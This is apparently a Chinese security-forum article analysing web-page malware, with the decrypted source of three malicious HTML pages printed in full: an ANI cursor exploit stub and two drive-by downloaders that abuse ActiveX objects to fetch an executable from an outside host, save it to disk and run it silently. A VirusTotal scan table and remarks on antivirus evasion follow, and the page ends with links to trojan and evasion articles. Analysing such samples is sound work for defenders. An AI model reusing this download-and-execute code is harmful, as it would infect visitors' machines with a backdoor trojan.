|
[组图]分析ANI智能网马挂马
挂了三个所谓的vip的加密网马,解密内容:
1、vip[1].htm
| 以下是代码片段: <DIV style="CURSOR: url(ah.c)"></DIV> <script type="text/jscript">function init() { document.write("");}window.onload = init;</script> |
2、vip1[1].htm
| 以下是代码片段: <noscript> <iframe src=*></iframe> </noscript> <script language="JavaScript"> <!-- document.writeln("<script>var ailian,zhan;ailian=\"<http://baobao3.slsbg.com/g.exe\";zhan=\"Microsoft.com\";try{var ado=(document.createElement(\"object\"));var d=1;ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");var e=1;var xml=ado.CreateObject(\"Microsoft.XMLHTTP\",\"\");var f=1;var ln=\"Ado\";var lzn=\"db.St\";var an=\"ream\";var g=1;var as=ado.createobject(ln+lzn+an,\"\");var h=1;xml.Open(\"GET\",ailian,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(zhan,2);as.close();var shell=ado.createobject(\"Shell.Application\",\"\");shell.Shellexecute(zhan,\"\",\"\",\"open\",0);}catch(e){};</script\>"); //--> </script> <script type="text/jscript">function init() { document.write("");}window.onload = init;</script> |
3、vip2[1].htm
| 以下是代码片段: <noscript> <iframe src=*></iframe> </noscript> <script> document.writeln("<script language=\"javaScript\">"); document.writeln("ZhanLang=\"http://baobao3.slsbg.com/g.exe\""); document.writeln("ZhanLang1=\"Microsoft.com\""); document.writeln("ZhanLang2=\"Microsoft.vbs\""); document.writeln("ln=\"BD96C556-65A3-11D0-983A-00C04FC29E36\""); document.writeln("function Log(QQ7999327)"); document.writeln("{"); document.writeln(" var log=document.createElement(\'p\');"); document.writeln(" log.innerHTML=QQ7999327;"); document.writeln("}"); document.writeln("function CreateO(o,n)"); document.writeln("{"); document.writeln(" var r=null;"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.CreateObject(n)\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" if (!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.CreateObject(n,\"\")\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if(!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.CreateObject(n,\"\",\"\")\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if (!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.GetObject(\"\",n)\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if (!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.GetObject(n,\"\")\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if (!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.GetObject(n)\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" return(r);"); document.writeln("}"); document.writeln("function Go(a)"); document.writeln("{"); document.writeln(" Log(\'\');"); document.writeln(" Zhong=\"WScript.S\";"); document.writeln(" ZhongJieZhe=Zhong;"); document.writeln(" var s=CreateO(a,ZhongJieZhe+\"hell\");"); document.writeln(" var o=CreateO(a,\"ADODB.Stream\");"); document.writeln(" var ip=CreateO(a,\"ADODB.Stream\");"); document.writeln(" var e=s.Environment(\"Process\");"); document.writeln(" Log(\'\');"); document.writeln(" var url=ZhanLang;"); document.writeln(" var Lang=e.Item(\"TEMP\")+\"\\\\\"+ZhanLang1;"); document.writeln(" var Zhan=e.Item(\"TEMP\")+\"\\\\\"+ZhanLang2;"); document.writeln(" var vip=null;"); document.writeln(" var kn;"); document.writeln(" kn=\"Set Shell = CreateObject(\\\"Wscript.Shell\\\")\";"); document.writeln(" kn=kn+\"\\n\"+\"Shell.Run(\\\"\"+Lang+\"\\\")\";"); document.writeln(" kn=kn+\"\\n\"+\"set Shell=Nothing\";"); document.writeln(" ip.Mode=3;"); document.writeln(" ip.Open();"); document.writeln(" ip.Charset = \"GB2312\";"); document.writeln(" ip.Position = ip.Size;"); document.writeln(" ip.WriteText=kn;"); document.writeln(" ip.SaveToFile(Zhan,2);"); document.writeln(" try"); document.writeln(" {"); document.writeln(" vip=new XMLHttpRequest();"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" vip=new ActiveXObject(\"Microsoft.XMLHTTP\");"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {"); document.writeln(" vip=new ActiveXObject(\"MSXML2.ServerXMLHTTP\");"); document.writeln(" }"); document.writeln(" }"); document.writeln(" if (!vip) return(0);"); document.writeln(" Log(\'\');"); document.writeln(" vip.open(\"GET\",url,false);"); document.writeln(" vip.send(null);"); document.writeln(" kn=vip.responseBody;"); document.writeln(" Log(\'\');"); document.writeln(" o.Type=1;"); document.writeln(" o.Mode=3;"); document.writeln(" o.Open();"); document.writeln(" o.Write(kn);"); document.writeln(" o.SaveToFile(Lang,2);"); document.writeln(" Log(\'\');"); document.writeln(" s.Run(Zhan,0);"); document.writeln("}"); document.writeln("function Exploit()"); document.writeln("{"); document.writeln(" var i=0;"); document.writeln(" var tt=new Array(\'{ln}\',\'{BD96C556-65A3-11D0-983A-00C04FC29E36}\',\'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}\',\'{0006F033-0000-0000-C000-000000000046}\',\'{0006F03A-0000-0000-C000-000000000046}\',\'{6e32070a-766d-4ee6-879c-c1fa91d2fc3}\',\'{6414512B-B978-451D-A0D8-FCFDF33E833C}\',\'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}\',\'{06723E09-F4C2-43c8-8358-09FCD1DB0766}\',\'{639F725F-1B2D-4831-A9FD-874847682010}\',\'{BA018599-1DB3-44f9-83B4-461454C84BF8}\',\'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}\',\'{E8CCCDDF-CA28-496b-B050-6C07C962476B}\',null);"); document.writeln("while (true)"); document.writeln(" { t=tt[i];"); document.writeln(" if (t==null)"); document.writeln(" {"); document.writeln(" return(0);"); document.writeln(" }"); document.writeln(" var a=null;"); document.writeln(" if (t.substring(0,1)==\'{\')"); document.writeln(" {"); document.writeln(" try{"); document.writeln(" a=document.createElement(\"object\");"); document.writeln(" a.setAttribute(\"classid\",\"clsid:\"+t.substring(1,t.length-1));"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" else"); document.writeln(" {"); document.writeln(" try{"); document.writeln(" a=new ActiveXObject(t);"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if (a)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" var b=CreateO(a,\"WScript.Shell\");"); document.writeln(" if (b)"); document.writeln(" {"); document.writeln(" Log(\'\');"); document.writeln(" Go(a);"); document.writeln(" return(0);"); document.writeln(" }"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" i++;"); document.writeln(" }"); document.writeln(" Log(\'\');"); document.writeln("}"); document.writeln(" Exploit()"); document.writeln(""); document.writeln("<\/script>"); </script> <script type="text/jscript">function init() { document.write("");}window.onload = init;</script> |
对所的木马g[1].exe上传到http://www.virustotal.com/en/indexf.html.得到如下:
| Antivirus | Version | Update | Result |
| AhnLab-V3 | 2007.5.30.0 | 05.30.2007 | Win-Trojan/Hupigon.Gen |
| AntiVir | 7.4.0.29 | 05.30.2007 | HEUR/Malware |
| Authentium | 4.93.8 | 05.23.2007 | could be infected with an unknown virus |
| Avast | 4.7.997.0 | 05.30.2007 | no virus found |
| AVG | 7.5.0.467 | 05.30.2007 | no virus found |
| BitDefender | 7.2 | 05.31.2007 | BehavesLike:Win32.ExplorerHijack |
| CAT-QuickHeal | 9.00 | 05.30.2007 | no virus found |
| ClamAV | devel-20070416 | 05.30.2007 | no virus found |
| DrWeb | 4.33 | 05.30.2007 | DLOADER.Trojan |
| eSafe | 7.0.15.0 | 05.30.2007 | suspicious Trojan/Worm |
| eTrust-Vet | 30.7.3678 | 05.30.2007 | no virus found |
| Ewido | 4.0 | 05.29.2007 | no virus found |
| FileAdvisor | 1 | 05.31.2007 | no virus found |
| Fortinet | 2.85.0.0 | 05.31.2007 | no virus found |
| F-Prot | 4.3.2.48 | 05.30.2007 | no virus found |
| F-Secure | 6.70.13030.0 | 05.30.2007 | no virus found |
| Ikarus | T3.1.1.8 | 05.30.2007 | Trojan.Win32.Delf.vb |
| Kaspersky | 4.0.2.24 | 05.31.2007 | no virus found |
| McAfee | 5042 | 05.30.2007 | no virus found |
| Microsoft | 1.2503 | 05.31.2007 | no virus found |
| NOD32v2 | 2299 | 05.30.2007 | probably a variant of Win32/Genetik |
| Norman | 5.80.02 | 05.30.2007 | no virus found |
| Panda | 9.0.0.4 | 05.30.2007 | Suspicious file |
| Prevx1 | V2 | 05.31.2007 | no virus found |
| Sophos | 4.18.0 | 05.28.2007 | no virus found |
| Sunbelt | 2.2.907.0 | 05.30.2007 | no virus found |
| Symantec | 10 | 05.31.2007 | no virus found |
| TheHacker | 6.1.6.126 | 05.30.2007 | no virus found |
| VBA32 | 3.12.0 | 05.30.2007 | suspected of Backdoor.GrayBird.1 (paranoid heuristics) |
| VirusBuster | 4.3.23:9 | 05.30.2007 | no virus found |
| Webwasher-Gateway | 6.0.1 | 05.31.2007 | Heuristic.Malware |
过Kaspersky、McAfee、AVG等杀毒软件,看来还是做了些免杀动作的。
| 后门程序知识完全解析 | 01-14 |
| 2007年度网马漏洞不完全总结 | 01-09 |
| 简单修改木马壳头让卡巴斯基哑口 | 09-22 |
| ASPX一句话木马--终极版&详细分析 | 08-11 |
| 认识使用 Rootkit技术的木马 | 06-12 |
| 分析ANI智能网马挂马 | 06-08 |
| Flash木马是这样练成的 | 05-18 |
| XML木马研究 | 05-18 |
| 脚本图片类后门病毒的完美使用方 | 05-16 |
| 两个批量挂马脚本 | 05-11 |
| 黑客技术之打造不死的ASP木马的方 | 04-20 |
| php后门插在图片里执行回显思路 | 04-06 |
您现在的位置: